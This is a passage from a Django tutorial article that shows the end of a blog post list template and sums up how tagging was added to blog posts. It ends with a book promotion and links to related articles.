        <p class="date">Published {{ post.publish }} by {{ post.author }}</p>
        {{ post.body|truncatewords:30|linebreaks }}
    {% endfor %}
    {% include "pagination.html" with page=posts %}
{% endblock %}

Open http://127.0.0.1:8000/blog/ in your browser and click on any tag link. You will see the list of posts filtered by that tag.

Summary
In this article, you added tagging to your blog posts by integrating a reusable application. The book Django By Example, a hands-on guide, will also show you how to integrate other popular technologies with Django in a fun and practical way.

Resources for Article:
Further resources on this subject:
Code Style in Django [article]
So, what is Django? [article]
Share and Share Alike [article]